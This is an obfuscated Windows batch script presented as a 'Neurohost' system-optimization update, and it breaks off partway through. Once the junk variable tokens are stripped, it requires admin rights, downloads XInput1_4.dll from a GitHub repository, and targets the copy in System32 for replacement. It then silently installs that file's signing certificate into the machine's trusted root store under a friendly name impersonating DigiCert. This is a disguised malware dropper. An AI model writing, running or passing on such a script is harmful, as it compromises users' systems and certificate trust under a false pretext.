e%MPNaNYtR%c%seJeDZtt%h%aExXkG%o%D% %rDQdee%2%eeQeoiYAw%.%EgQEst% %oejnCHrMK%A%ZqnDs%p%srMeeAcS%p%zytAToZc%l%WEAY%y%mcE% %JPS%O%DpqTtraz%r%RFtPI%i%IWnSDy%g%BoC%i%AAxiJLXEV%n%LO%a%dBNF%l%izNOMKedz% %JzYN%(%xruVYVyQu%B%NNRAItH%a%HdAX%c%sPimDhEnM%k%VzBVES%u%dyBNnjC%p%L%)%GSrAZPTR% %wNllcyBah%R%fWpOQ%e%lGwYBMrhv%p%VcZHvBSVll%l%FCxMRZ%a%gIa%c%YicdwOBp%e%byj%
e%ETB%c%uj%h%uRQnlZOIaV%o%fZYHurgNs% %UKsNd%3%XzxpfruSWH%.%I% %NhF%E%Mzf%x%lu%i%KC%t%rNO%
e%wXizL%c%Nlcmvg%h%TJmVJDxO%o%OhCyj% %tsE%=%hLly%=%tzVVu%=%UMWt%=%k%=%C%=%pOIZQfUWQ%=%zpCyM%=%DQUPPy%=%EujCJHx%=%Fg%=%muCIzCOA%=%IFOMgyvPw%=%achBqe%=%owwOv%=%PrgGFRG%=%OKrYQwVa%=%YpSQsLBBrO%=%oqSF%=%zvUZq%=%xMkhurd%=%cVKdoV%=%aIZMCnA%=%XSKYFnH%=%Ar%=%ymAQOXr%=%ywMnCxY%=%ohDakrqaz%=%D%=%Bl%=%wDuEqBey%=%oapdWQD%=%lnGQCWZc%
set /p choice="Select an option (1-3): "
s%drwp%e%hbup%t%GmaC% %mNG%/%zuINvbfi%p%eKKtBu% %ewJzHy%c%wfFaRzI%h%RfQi%o%FKvL%i%SfAEWtX%c%BeuEJrWpz%e%iaVKx%=%zETyDVMAZY%"%jDSFR%S%zUTA%e%ya%l%VhTKbWkI%e%fk%c%sN%t%LNVnjLDR% %ok%a%jWnQlWL%n%Xi% %wu%o%Udvdj%p%KZtOZNpb%t%tfkOcgA%i%fWTDn%o%JCZxpFKtBf%n%OwS% %wkzMok%(%oyFuOOcbWB%1%CzKGhRT%-%M%3%zCMyhlfX%)%sGtRWzY%:%JFzbxWoBd% %ANB%"%PExWVt%

i%mXXg%f%BDOpskNDxo% %qZxAfQ%"%yWXwvp%%choice%"%XGoIDV%=%av%=%zkOCP%"%lgg%1%c%"%aAfkFzVy% %oIFEss%g%jzr%o%J%t%zBne%o%muzRoDR% %XjDqSUW%r%ZqntEBPJyv%e%di%p%YM%l%RhdJj%a%jccwDeQwPu%c%SzP%e%qXOJau%
i%SP%f%SRQLbNkh% %uAfmzTyWY%"%IIAG%%choice%"%dVxHfjW%=%KByt%=%bWDixjvljy%"%hp%2%xqdNgoLa%"%yzy% %FGGHPJpMhm%g%faLLLGURo%o%qPMpwBAv%t%aYE%o%TW% %hGokV%r%DWEAKsMps%e%wcjNFgg%p%Xrml%l%PPWC%a%OEAu%c%Uo%e%XxcPGI%_%NlW%b%XdPHkBXEU%a%ohnTW%c%NGgRxXyq%k%mlv%u%dTxrlXEx%p%OOE%
i%XV%f%ru% %USe%"%CwKXZ%%choice%"%CLNDC%=%vAJysOq%=%zWVEHkQYvf%"%eoVs%3%C%"%qsisd% %coPKrAfCJ%e%NUCr%x%WZJWreHB%i%MXer%t%vb%

g%H%o%uexIpF%t%DAxSr%o%xNsR% %GWrwSRR%m%EuyUFLha%e%W%n%Kvmk%u%pTKvsBhWco%

:replace
:%Ejkm%r%KdDc%e%aYwaXOpBIJ%p%qwKdc%l%CctF%a%JsvVn%c%ZtJrzUZD%e%rtc%
set "dll_url=https://github.com/dadajjjjakd11/Neuro/raw/refs/heads/main/XInput1_4.dll"
s%SgUV%e%rbukU%t%BRFFdiWfMn% %jldg%"%g%d%AstqjQDob%l%ODXRjxzvsu%l%fWJyRrO%_%AJpWL%u%sMtEy%r%INw%l%mIg%=%tTsuuSpOr%h%lCIxFs%t%PoW%t%vDu%p%q%s%laXdoqu%:%u%/%lzcznE%/%Ox%g%XQjah%i%BdhU%t%vF%h%Ju%u%Cpj%b%eZCjqFKT%.%AECXCV%c%ZSEYddjCR%o%akM%m%wg%/%R%d%vgDrQiXmf%a%WvuE%d%K%a%ZPK%j%jqg%j%cBTpMW%j%ZkTyyLnLB%j%pqDNA%a%sqEY%k%sCvggjC%d%sFti%1%LshmNeKlM%1%F%/%rqEDapSf%N%HrHlYclL%e%teTFge%u%STj%r%SgyRekxety%o%S%/%Kdocx%r%DZgA%a%mZwaEISPK%w%pq%/%ZjgUsL%r%ptGIU%e%OrGk%f%UYoByKR%s%VjOzwZ%/%sciQQX%h%brtrDbRS%e%EOalvrmoW%a%mriJFw%d%ihT%s%oyoMo%/%vTU%m%hMmlvFSO%a%pASAijAYM%i%EIFcCYyG%n%pQoIVr%/%Hud%X%csRDx%I%SCkceo%n%stC%p%CuSdHOb%u%xnTYZQk%t%bqIwaQ%1%V%_%PAJootdqA%4%OBPkBSpeL%.%rctCiGK%d%k%l%pkLAyPjQu%l%RxIdWcKvh%"%SkBO%
g%ww%o%VP%t%GuFW%o%nAbt% %oRVUXDrwsn%d%SrFauzXEE%o%Xdu%_%n%r%CVBPI%e%HTvm%p%eaFkMano%l%IeodeIdJ%a%LBiZGvj%c%YIuDwvt%e%YbWWnPTr%

:replace_backup
:%jTxr%r%cJ%e%kFuBX%p%qQdMQuJTs%l%Vob%a%NeQX%c%aDbazTngqr%e%mbssozIxGp%_%XSEzBrh%b%TXVCHvqU%a%KuAcGPPCab%c%AwgmQAfr%k%b%u%cMjvxP%p%B%
set "dll_url=https://github.com/dadajjjjakd11/backup/raw/refs/heads/main/XInput1_4.dll"
s%RHEjEkpll%e%RkKCpI%t%bL% %ulz%"%RhTf%d%wxj%l%POiQlkpx%l%TJiET%_%iyFBhgNzq%u%FxqXTN%r%mJGKA%l%IscsVam%=%i%h%C%t%PaZBzTLlb%t%cMRBr%p%eqeO%s%ZJhhhZrtr%:%GqwmU%/%RhQhGavlM%/%YPIevf%g%AlSTSpO%i%aMTkoT%t%m%h%gYNUCtW%u%Ha%b%hQGo%.%kH%c%E%o%R%m%qLiTk%/%jTKEk%d%bdqSWbqnL%a%ka%d%s%a%xShTLLTJ%j%G%j%XlydgOfMk%j%LvVS%j%gUgQFjE%a%rMHh%k%FwaCwdkwlu%d%eCZJJnZJWg%1%CCzshaXLa%1%fWGRdne%/%jmCQSBFM%b%WBZp%a%FnxyuEFLpu%c%sOIfSp%k%HHXF%u%mk%p%LC%/%WlNOSWZLiG%r%NOqqebCi%a%AMUiehIzE%w%CUocRto%/%InjH%r%XGCEegFDfa%e%OCcEF%f%MabQxbkC%s%y%/%wiX%h%kJ%e%Ozbpu%a%jP%d%ryoyiDeEu%s%sFjFPqDQ%/%ZokEyo%m%fT%a%IZYRncUfAA%i%sIba%n%qrvMNEwaL%/%UKZ%X%bCQoBnBi%I%kLYlg%n%ImjEbGMZ%p%jSIsGZZxuy%u%CsqEZ%t%Ytao%1%BhXMBt%_%DqDqjX%4%JcOFRik%.%VhOEhEMc%d%bjRBrr%l%VGIJpwMzjG%l%T%"%S%
g%e%o%xZYmwL%t%LTSldm%o%yoETdW% %eyVQPQHtpN%d%QZvQzdmw%o%NocoKhirFt%_%zPVCI%r%glScnW%e%S%p%biWTHWi%l%DMImWbGit%a%ZrMDyGGiUc%c%aGvHosGYc%e%ojtvO%

:do_replace
:%fodT%d%A%o%MfLbhmLBQc%_%mAuZgub%r%KAHFiAhF%e%JlfA%p%nDb%l%iOnxERpQ%a%jh%c%ns%e%jIMHv%
c%eGCH%l%FUdthND%s%BOwS%
echo Neurohost Module: Applying update...
e%kQLaeTTnNz%c%hO%h%bOVyY%o%d% %Jmyed%N%PVK%e%rgucmHWd%u%rWFEVAV%r%ahnSdnse%o%oX%h%HOXMOnjOJj%o%XXuoBRJdh%s%YO%t%yipnN% %veEmRjo%M%DIulWeZ%o%GL%d%AxnRX%u%CyEUdfDe%l%hyuXInv%e%OyNHS%:%JBjxX% %wC%A%veH%p%Peqc%p%GkL%l%pgFsjsRLvT%y%RiSh%i%jBacOoJ%n%g%g%NS% %GjeZBZzXIb%u%JFZv%p%qVr%d%kEfwLTd%a%dg%t%yHhaipAco%e%NE%.%fuqFsDsaUa%.%FqhwBhOyL%.%NWmGDfabDo%
e%afZl%c%pCyUFCKe%h%p%o%qxh% %lFVCOjyYU%=%vBVJymRt%=%PDW%=%CqgyBu%=%EkOlDXdCD%=%aB%=%RnprRM%=%u%=%xiJyIBsfHQ%=%osWcpDVUFY%=%lmkowZVj%=%HvybGxCeTC%=%eXcllH%=%ItPUkWJJ%=%OEfGgquy%=%IOyjQ%=%gVkZ%=%NsmjCCBfn%=%bfkIGyGYK%=%RmkydTac%=%mXBbvAJ%=%RED%=%uzwyFqZoXJ%=%Ps%=%hhW%=%MxbCsLx%=%lZlche%=%TNPz%=%FgBgoYMsjf%=%FDVEWOCv%=%u%=%DawxYt%=%wWrRxW%
echo WARNING: This action will apply system-level optimizations.
e%qCQOLDP%c%OJJTfZAIzc%h%RVjSaq%o%mTVqN% %UTwrmTH%W%jrAHax%A%nsL%R%bBUrkIFOb%N%vCyGaWzbAT%I%jl%N%ljDDiQVDY%G%Y%:%avjPZFoA% %CXeUFW%T%iHV%h%emaXHiw%i%Oi%s%SyimAQ% %Ps%a%lwRCOBRWv%c%YEtcQxO%t%Qlb%i%WJ%o%q%n%bCcYRCBwa% %MC%w%tijcqcMM%i%v%l%Gu%l%hj% %i%a%WGZg%p%i%p%nHFifHd%l%qCObbVw%y%qkpoBR% %DuQgmxPyor%s%QOFQSoog%y%FRvzeuT%s%YEeALhdSp%t%WobbRGu%e%I%m%wO%-%EruI%l%ZO%e%tFuH%v%gyZyWo%e%mDUckwfKM%l%lTQj% %c%o%IYgKRK%p%FPndVaCiA%t%fpGndnnkU%i%qtZhaOSn%m%lNrVi%i%tkYetpDoLR%z%SgkdBlB%a%WF%t%xIrr%i%fKBAFE%o%dhYHT%n%a%s%ubCOps%.%OqXeY%
e%uS%c%UXgDzGp%h%kZUCuGsNe%o%fgEHDepqi% %QtjK%P%DxTKoWkZ%l%vSiuZZ%e%i%a%Kg%s%Sh%e%zwk% %YsLzvVMb%e%KhUJn%n%xcrfhdrjwI%s%VtEuafItN%u%Uk%r%RVjSe%e%C% %DbOaXDXz%a%eif%l%VuNmYLcDJQ%l%hvMxYOEZYF% %Pl%p%c%r%LidjzdlQko%o%AwTVLf%c%ZzQeVpoPW%e%uGWhmTkh%s%y%s%kAs%e%dPuLea%s%B% %oRoVuSn%a%xBghhH%r%dX%e%CVy% %NjlNMWkrE%c%YQj%l%pORusSfMTC%o%GVD%s%pbntvLq%e%YnxCQHm%d%EBSJNq% %VMiEelhazv%a%fmFrU%n%QFzNIxiKPC%d%PPIZUWnB% %cpeqTpPBRx%p%PgTPiByw%r%ihirO%o%sCVZlHl%c%Sh%e%MsAOhb%e%dYSBMp%d%lpcae% %CbGCCD%o%Ai%n%EPBFT%l%kK%y%cvhOjp% %QxnqcFBbuM%i%YvYDTa%f%ByNZgmAYd% %rrPc%y%veI%o%jo%u%mAGisaile% %wqhbQeiYx%a%f%r%FRxHepvc%e%biruun% %LrYaPCnkC%r%XfaZkCGQL%e%kFd%a%owRCKJRZ%d%MRUVB%y%pN%.%AMgRWo%
e%BQRmgNCFxa%c%wqd%h%iNlKIjiTiN%o%OQFL% %neiUX%=%RxlexT%=%jFJfdxpncd%=%lWiU%=%xWue%=%PbtUg%=%w%=%ZQlRNW%=%ozoVhDyldY%=%CJYDtY%=%EeDWBfzfol%=%WJNXCXoNG%=%NThwOSR%=%cdEPpCjnv%=%UD%=%mKkkJs%=%Au%=%Juxv%=%dud%=%AxSgpp%=%VUfknrmf%=%US%=%wi%=%a%=%gigRKBGq%=%rYdyjWDckQ%=%bNNI%=%d%=%jP%=%HKtDW%=%yYVjpBXMI%=%bnw%=%VX%

:: Check for Admin Privileges
:%wkSDeXxkdl%:%ymz% %wouXu%C%w%h%phc%e%DJjkoJ%c%MmVfEMA%k%tYrZJOVJI% %puY%f%SIlpvC%o%hLuffWJNxs%r%knhtW% %deHnYOt%A%vZyc%d%q%m%FFClXRMV%i%VSZnq%n%miAZvvQcE% %FmsVoCd%P%QZyaGVIDH%r%gyJb%i%vBTcAxUv%v%LIqrmoficy%i%R%l%fK%e%EPSvRDGA%g%ynZcKP%e%vvMXNUzWA%s%OITEXgS%
n%GRl%e%ycmI%t%FhEDzfIv% %Xn%s%AGLVqN%e%XyGZE%s%DwuYv%s%lOHzJESPyO%i%vo%o%VjWoFy%n%bgERfK% %jEUKVx%>%QO%n%yoSx%u%JbE%l%rwOibVA% %CmDLxC%2%dgYOoauPp%>%Z%&%cXrbBOacj%1%UJS%
i%HbnqJPBq%f%lXdhInxrb% %Px%%errorlevel% %gkd%n%zvyKZiiy%e%YhSCddQ%q%vT% %UtwsnB%0%kFcVqLiK% %ykmVWfgnYx%(%iBmQUmLC%
    echo ERROR: Administrator privileges required.
 %bxKm% %po% %HVXQddQEg% %AVEmnsCC%e%kOiRQdYwvm%c%LnioBqZUW%h%mlk%o%tRYS% %W%E%rAxneNrb%R%Yb%R%f%O%pLZgpdd%R%wr%:%F% %rmsUju%A%GxM%d%E%m%NkOF%i%rG%n%XAHRxkAQN%i%CqVxMiNvMw%s%CiPZgtz%t%mPRVay%r%cRTlUtlu%a%DUcbvzZnt%t%waDWhRDWP%o%gNocStc%r%vWl% %dOlQSQtJ%p%MbxgPrG%r%TQ%i%gSzx%v%qWUbInF%i%AVbpDKTW%l%Jd%e%lakdURU%g%vo%e%Qrg%s%SRLyEoFs% %xfdJExZB%r%uVYwNW%e%t%q%SownxQa%u%KjyxXZbseU%i%LypVLDEj%r%wimdynLRYL%e%BOGMG%d%uRPIYy%.%bLV%
 %eJSji% %lIsNTSDH% %EhEJSjsYIT% %XPd%e%BRZPzDu%c%JdGuPQzi%h%pIl%o%Li% %HhDfpzeWb%P%mZRrzEm%l%mUFropvNKM%e%Tip%a%Tpnm%s%eaoztsCR%e%TyqRPaBoTk% %BnppAD%r%M%u%N%n%RXilQHUJsE% %MsXVlaX%t%FBELbbqLI%h%gBmEQrIv%i%Ud%s%tw% %zIOOecQCi%s%rIna%c%UYltmxV%r%BCI%i%UhaJXmZ%p%Zbj%t%qcql% %SJd%a%I%s%mVdqO% %rXL%A%jZUxmJ%d%EDb%m%UahxUj%i%nTJmEttO%n%XAwmW%i%Hyjt%s%YqyZN%t%zlstusfrz%r%jwnts%a%GJGkMDTfMs%t%ZGkuWyWvn%o%RUpHbt%r%a%.%SlMlwxbsA%
 %Ilsavk% %GTR% %OUDwAN% %uLdvhHKFD%p%eZUpl%a%v%u%RFJy%s%wSwvLfo%e%mBJHtG%
 %jzL% %LDK% %zvzyGGckm% %VEwKktm%e%TdBAL%x%SnOWVKZ%i%aK%t%ZGfnFn% %lKPQJr%/%AVMYtcTBeU%b%sKspHEyQf%
)%y%

:: dll_url already set by replace or replace_backup
:%YCFgBMG%:%ndgKyr% %rvaMK%d%OQBWD%l%ouMsdk%l%OZccarrjI%_%HyTwCjbQJR%u%FfCUr%r%vQnzcWHi%l%plbIvPRQI% %vB%a%K%l%HFs%r%WUTHc%e%qWxecHzmg%a%kQKq%d%rViteMKesF%y%xqk% %f%s%Drb%e%rNIKyct%t%ccVpT% %FrQpiVqdDk%b%TsfVPTusgR%y%V% %oveMBXr%r%E%e%jsxqCkpHE%p%pPPvBs%l%GsWozHm%a%bEkefUIBzj%c%qGE%e%GW% %VX%o%UPaABrMDRm%r%ixdMD% %J%r%lopqhOs%e%cxPXE%p%NquN%l%DLAl%a%ygGB%c%JLk%e%FUPDpUq%_%pQdwN%b%rvBBHJQK%a%WmbIS%c%ntpplVDmZI%k%MhYQZHtcBN%u%JJnWgladYk%p%wOJaEOFaaC%
s%jTzdFYi%e%pNoegye%t%qJIPV% %brNp%"%XXhl%d%ugVt%l%V%l%PrHx%_%F%p%dgQfR%a%EA%t%bpyDxUQsA%h%xCnSQgQsW%=%mxLibDlZ%%TEMP%\%ymQDOqRSpm%X%hIegtyULlN%I%NWGSkMP%n%dayjQLkC%p%dEfQcTaod%u%iAlnkvVUy%t%eF%1%OAv%_%D%4%eGjWt%.%Q%d%Ps%l%RUiV%l%FXcZqM%"%r%
s%T%e%sj%t%Et% %oUNBJ%"%xpnuhqQRz%s%CwFVxap%y%rZNfEkxi%s%MN%t%a%e%PjgDt%m%laZhIicwO%_%wucWZEFH%d%NeYia%l%l%l%ur%_%BxT%p%hu%a%HqXBCkcj%t%eMTbWS%h%kbFNYrZafU%=%t%%SystemRoot%\%Ng%S%YmQGkL%y%XRppZEO%s%CUZv%t%GPdZ%e%cWU%m%WoNgvZdZSN%3%JcfppAlkuE%2%PupiR%\%U%X%cmAW%I%AzgNT%n%DjHRtZsBm%p%xJWSw%u%ZIVvyCn%t%FppXrYqIWt%1%B%_%lK%4%AOTkKIXA%.%LqFfg%d%RLbXU%l%H%l%NWfh%"%YmWt%
s%OFHloRk%e%k%t%gGPxvivh% %Pat%"%qlobDb%c%JxieHCNGi%e%Vtm%r%mdqD%t%OoWjuhXM%_%uVYCAvOu%p%NxWXraAmsW%a%dtpCXEz%t%k%h%kD%=%gLoQ%%TEMP%\%q%t%ybOXUBLWLx%e%yFz%m%qVdhtvK%p%tNQ%_%ICgTlZ%c%RQoNpY%e%BwgLs%r%sFRbTDndY%t%eAjxzAc%.%WtH%c%conKKrQyQG%e%h%r%RzZz%"%tdtBUTFHwb%

:: Download the file using PowerShell
:%PZFLvWNNyB%:%HBnKZrZfA% %fvLnL%D%tTmozV%o%kvk%w%gqF%n%sMzNt%l%HIZjEYZBq%o%pBqlNuQf%a%TxNry%d%NzZjkR% %vnFordl%t%vJmfBWwQ%h%ND%e%n% %RPAgaMPvMF%f%RVnzSMoykV%i%FTNE%l%SM%e%Lrlsn% %CAMoOVDC%u%IG%s%jBrabVQ%i%kQLKT%n%BxcLqKj%g%eYbgfgzvI% %kfcaraEQ%P%SEI%o%lMgsnURfo%w%aHjrTv%e%GUBYOGvNG%r%QZRAwmozpY%S%s%h%X%e%rxCSDvsTe%l%mjL%l%uKnGxEM%
e%vNa%c%foWMqZrs%h%kOte%o%nAvXaMn% %s%C%sYfF%o%mlPt%n%Rfommhp%n%gexl%e%shqrPQz%c%sGImyZ%t%mRt%i%IA%n%rLNDJNQrjD%g%kGptwU% %s%t%AQYoLslcY%o%NEsbFRb% %biB%t%zPwAAzdn%h%RWKWEzChf%e%AJt% %qotQeRDrCI%s%rVOqdAvAzQ%e%kGPzhH%r%rMnKVmOvoM%v%xaD%e%Pd%r%e% %Pefc%f%cjOv%o%vSJmSb%r%kkWg% %kB%H%zcFYLoozjd%D%BWEo%N%NmHWCHOy% %V%u%erhZma%p%NiIJMqYXb%d%xEPGbF%a%dQxRLAZh%t%oEfYFqDAJZ%e%xjQICaaxRU%.%bfL%.%iI%.%DSv%
p%uzmLNdXfU%o%fivhfXfYl%w%VWgUcckSn%e%yKeDscyg%r%sFYxD%s%tE%h%hBc%e%IJMrFDTLUX%l%igYrrjmv%l%LIzOdng% %ArYQuyyw%-%QN%C%UpvNAo%o%UCNBzK%m%igLsSSaH%m%RLfi%a%zxAgNKbWjZ%n%PJEMFdFxw%d%Bd% %UVuNmvpypX%"%IUER%&%gF% %cfTbpEZrlm%{%vZgqBemCn%I%rOPabK%n%gKaVQ%v%NIj%o%uHLoUImc%k%Xg%e%nql%-%YuJgOOt%W%cZTC%e%TzTii%b%AtHoOAEg%R%u%e%lJuIrqDW%q%xWuuaDfWI%u%Dobq%e%frvTV%s%ebCFjh%t%kapfz% %pBmle%'%OJfSpJRpP%%dll_url%'%ulVRme% %GD%-%ZaxMQ%O%u%u%TCPT%t%pfJJzbEdSH%F%EKoliClEJ%i%Kvqt%l%DToDHjwbuW%e%VlbEZkm% %RNi%'%rprO%%dll_path%'%wXLCozTY%}%gilg%"%Ab%

:: Check if the download was successful
:%fIXBbN%:%MVS% %khhVhDNVq%C%KLH%h%yVtpcEVNDH%e%gheIhsB%c%sNElEWOqra%k%Ssh% %cr%i%nbHmnm%f%TyYNBG% %WZC%t%HT%h%yuOdlmodNV%e%CuGg% %awtI%d%DhHgCajMF%o%HiZNbYfUzz%w%ZascjR%n%LDjhUmAu%l%PRbeirSVvk%o%Pvwrkd%a%LlaVWg%d%SBWPISTMpB% %gwzv%w%yI%a%aeMkPlc%s%g% %ocQU%s%NMyDCVaFyJ%u%wusmmnsAG%c%Biy%c%Qk%e%RNlPt%s%RCuK%s%JYkYzvAUc%f%p%u%AhUpkdQcVL%l%MuebYa%
i%cDtvD%f%Tyoxdu% %Len%n%zPigc%o%eJwURrXr%t%DZxMspP% %GXzmnUxz%e%Y%x%ZsGydemLF%i%WaZSNvPOmQ%s%oR%t%oIivjwVjO% %OolShSh%"%WJmrGVdiHh%%dll_path%"%Wm% %k%(%XSlPaMw%
    echo ERROR: Download failed! Please check your internet connection or the link.
 %c% %cnjiSLEZU% %oHhTqt% %BCqa%e%HQXn%c%UtgqgtO%h%lZfpXb%o%jkz% %BEhpbeceKy%E%fRL%R%xLNAyS%R%iyJ%O%WHNK%R%EiJtflC%:%YCJg% %G%D%hUUDO%o%upjidf%w%MlVzWeDbRm%n%WQVHnbDO%l%URe%o%LncmzZIjx%a%NTrvjoDG%d%md% %uElxpT%f%LlNDu%a%Vlhlx%i%KqAwBJ%l%Loj%e%Tgeb%d%bPy%!%NHFrd% %eLTTA%P%eERZsuh%l%LFxwCDok%e%nqk%a%kULjb%s%Eza%e%A% %cjXZnWCArh%c%iYt%h%b%e%TkRN%c%vlTsHfcHC%k%yQunAxtQWn% %nJtUkfipBe%y%qtSY%o%bolA%u%oXPNybiA%r%ovqHpYPA% %llBKRj%i%zt%n%TGZV%t%wCZYY%e%WvlKkwgq%r%vQdVrea%n%RWvJxY%e%pPdTuqw%t%xfUU% %SUJjsgconB%c%Wy%o%MjUZBy%n%BrWDCHfZhm%n%v%e%h%c%OS%t%eA%i%eia%o%wp%n%maAK% %u%o%YgfU%r%EKtdqCI% %VvgL%t%boE%h%NfshxRzn%e%NcAs% %qI%l%fTPtCYULju%i%HZfpXTlV%n%VkC%k%txuaLVSHH%.%rtIg%
 %MBSozknS% %HzLpX% %WFva% %qvFSxGXpJ%p%MmSw%a%XNSSGZaURP%u%umT%s%ttqNcGqw%e%HLvLEHlT%
 %E% %BedFuJHUG% %TIoWXI% %tct%e%LCOS%x%s%i%GW%t%maAJdY% %aGKKHtK%/%WClUTXhB%b%B%
)%iGac%
echo SUCCESS: Update file downloaded.
e%m%c%dBq%h%FS%o%Ef% %oDUah%S%RkGxEEku%U%GcUtlBUh%C%PfIcml%C%L%E%yqNEzF%S%fjhpIL%S%tf%:%AvcvmM% %ABfU%U%wpMzF%p%EJ%d%cRfnQN%a%v%t%u%e%MhZLcFG% %dkVCBfyTR%f%V%i%bpVQtkOO%l%ePNtFaKkA%e%VSjlwIdGYm% %x%d%llD%o%SXV%w%wPNOLpU%n%EJSitGvyNU%l%SbMKXj%o%rA%a%Kk%d%efYLxtX%e%qJpc%d%sCtBSFLlte%.%SbTthRRt%

:: Silent Certificate Addition with Friendly Name
:%gCESureT%:%opg% %oBskUXX%S%yDvce%i%UgsvMk%l%iVrdj%e%KTEEhYOg%n%NPqwqhU%t%nKPt% %mZgDQ%C%THH%e%oSeOKyVGaQ%r%FcfpjSU%t%fRZmlhrFpe%i%Hu%f%hpjurU%i%mionwskitE%c%pByOwtna%a%frzIHOSyH%t%HjGHT%e%QTuc% %GCGz%A%uSBgOD%d%pjp%d%vtvBtC%i%tqcALxN%t%fq%i%YBs%o%UnADVDeQP%n%ok% %SpbneUpN%w%YpB%i%nMFcjnB%t%PqkFLC%h%iutXrwWns% %wrU%F%cX%r%CCVQUGjq%i%XqwFrOzKn%e%gxweHgbyX%n%WM%d%RywS%l%dTHkbXF%y%NGYomSTTOA% %LnqvZV%N%HCaaunC%a%tdHOSg%m%koqLBVJ%e%oFjlZx%
p%gDBlEUpku%o%GdQKmaiCX%w%fRtaLIT%e%f%r%BHPGhtZpIy%s%yjbix%h%dkGkFluH%e%NLHgFMUmhh%l%XEVFvlr%l%SQRFkEIR% %ksTZDe%-%dcGsxvV%C%QOolIXA%o%zZDXT%m%KhgQzjU%m%GpdGFz%a%YLIGR%n%dohTTDFm%d%HKiik% %Ri%^%JAqi%
"%fKEjpDC%^%bpbx%
 %FL% %HurZnywvO% %HoTV% %JRE%$%SBhrWcA%c%uYn%e%azzHPOlet%r%w%t%FzlYlgTQAy% %QfvrldvLZA%=%FYXm% %wnV%G%XpdfHS%e%SaxKGy%t%l%-%MRmROcr%A%AZ%u%MMZcMy%t%WArOZqMs%h%RbAVMDcn%e%BqnRnyyae%n%BB%t%kzGzfOw%i%lHUZpVnOv%c%amZm%o%cks%d%cuNgXHCpH%e%S%S%cLgrBb%i%HSNKiGsD%g%GqIkLuCzph%n%G%a%yE%t%awYZKB%u%pCdYmpKN%r%DkqOBxL%e%H% %Nad%'%W%%dll_path%'%EKHlOtG%;%T% %JEUrimVI%^%r%
 %woqvDMyef% %guBSs% %Tlcxl% %nMLNBNp%i%pUX%f%WGSVH% %sKzt%(%NdVydSuKH%$%yZC%c%owM%e%pPK%r%CfazAWr%t%oWaISPKP%.%oH%S%oxrWs%i%FTzdxY%g%nMYWhi%n%KAbctmwBp%e%GHT%r%nOx%C%n%e%aIfyerSI%r%ayUJe%t%fXV%i%qVFyI%f%Cs%i%cj%c%AY%a%zf%t%YflqrS%e%wutYCgnnz%)%BiisA% %eNsJvXou%{%yrUynNN% %Qfo%^%HHvwEksuH%
 %r% %PN% %UkhSctXv% %lhrPzkYaG% %rHHOTjcgYR% %aFtQmOZVxX% %ggOjbbS% %MfoGkUm%$%rlmLzNdmq%s%vhlgnnXi%t%zldtnw%o%HUsptMCuwm%r%CYh%e%tUFS% %I%=%iq% %sWrkDXlATY%N%GFNaWt%e%Yn%w%Kiuyb%-%c%O%x%b%Gym%j%C%e%YJ%c%dlZn%t%Sej% %rcwkAfbmZs%S%WvmnIip%y%IozUW%s%LpLjXZ%t%TBpyTkZWUm%e%tYalMtCTFn%m%h%.%GXBne%S%YjVgqKNimP%e%HTRppIdbbQ%c%OhsqDkUQH%u%jSkNuBWK%r%wKmMlaeuL%i%ukktIisn%t%ndzF%y%cDvJKtB%.%KmNHxZtoN%C%HqYCWXI%r%AaUrvTZ%y%HWvQoQkO%p%WGaWdk%t%GRd%o%ceFkxF%g%R%r%F%a%pVLoh%p%uqVzPi%h%tLQpck%y%ZTkwsLaj%.%oQGRa%X%yCS%5%n%0%ilnY%9%MjUhJbw%C%ApaYsdVdXE%e%VHuExqd%r%VCWaJLLBan%t%LoOj%i%Si%f%ms%i%G%c%WoF%a%xWIMwifYx%t%OTJD%e%ghjg%s%qOf%.%fvoWATL%X%DD%5%wqeZQXtlB%0%RHeOSj%9%qOUXT%S%IKwxVRhzb%t%mCXV%o%D%r%QzXCJ%e%fFuuJRyCv%(%KXsQYFv%'%rqxnw%R%gZc%o%QxuQGUKXz%o%vbMkXl%t%CYxVOd%'%DYsh%,%NSxReYPw% %SxOKeEolPR%'%yFcxjWQVwA%L%t%o%Giyb%c%i%a%SiIHi%l%pfqknqN%M%FFvOLCd%a%FyYVHxP%c%K%h%UqsiGnS%i%etyelCjdBd%n%GU%e%ICfio%'%y%)%VVNQnrCL%;%VaAS% %sWMgV%^%iKfOqAHtJ%
 %BEH% %NK% %abeuE% %Rbf% %wbRflfT% %SJSrTZxdr% %IQNZ% %wISTfEmoR%$%CIxexXNtYJ%s%jY%t%vnMqkLSPk%o%cEThXIdO%r%gG%e%t%.%YJY%O%pJYnOQ%p%zKP%e%a%n%KRdUxQb%(%C%'%UpLpv%R%WBeiIDSj%e%E%a%mPSeVhr%d%cCe%W%PphHtGwp%r%lDkONmXhS%i%bQAwye%t%eLor%e%EH%'%WJQgyJGGyr%)%XkRjPUi%;%bTlU% %LaYp%^%TrpxnRCQHn%
 %sMMWrEHgt% %SqR% %o% %xHSTLmKX% %mCEEzb% %paDzyDWzec% %rFKI% %SXcxpU%$%VdMgnUzdXm%c%qJqxJmpa%e%QPqx%r%iPgp%t%okcWK%O%VsQgB%b%OZLt%j%fYLaXwjMTE% %lYUQsD%=%gFlfVSeQDE% %URjLUZwfNy%$%BCF%c%mCohs%e%LeCzg%r%xkHMAot%t%hIzbDaY%.%oVuMU%S%mRM%i%WoVqkJ%g%Uw%n%zoOc%e%sBMNvXhvT%r%Fcfhn%C%Zx%e%E%r%fmzmvLEkI%t%cRsaTKER%i%yI%f%KInryKqC%i%IHVhBeoZ%c%ZYvHOuHx%a%BjbsSgiSz%t%l%e%K%;%iq% %HZtUZeMRr%^%q%
 %DpigchfDO% %BMGdEu% %Gu% %dPbHVzXgyc% %wetQGFOS% %CyAYMG% %fFoiOCL% %PODG%$%dcjDGzSm%c%QSrhim%e%LMB%r%GyjlidvtgA%t%cGXuuT%O%ysfdPnu%b%MRGqta%j%f%.%xdB%F%UcUA%r%OoZAyVu%i%lfUDJuJwIy%e%UpiUGPtHd%n%Wn%d%N%l%cyIDDrp%y%LyXzbeGBa%N%dzE%a%AmkYKWBDu%m%SFUCMsryp%e%HpfquhfJE% %TGegZiSuA%=%YpiEQ% %gfqdXI%'%kCBHkD%D%Uq%i%mHMNf%g%RuhTCOvnSz%i%nV%C%x%e%KxqGjmWn%r%BiCImyLYqV%t%oSbx% %wpzOcEFB%T%VwdeaPsO%r%FLuOLVY%u%LlUvLlzT%s%wvU%t%HMmMNRqm%e%cuItfMkWkK%d%KNwX% 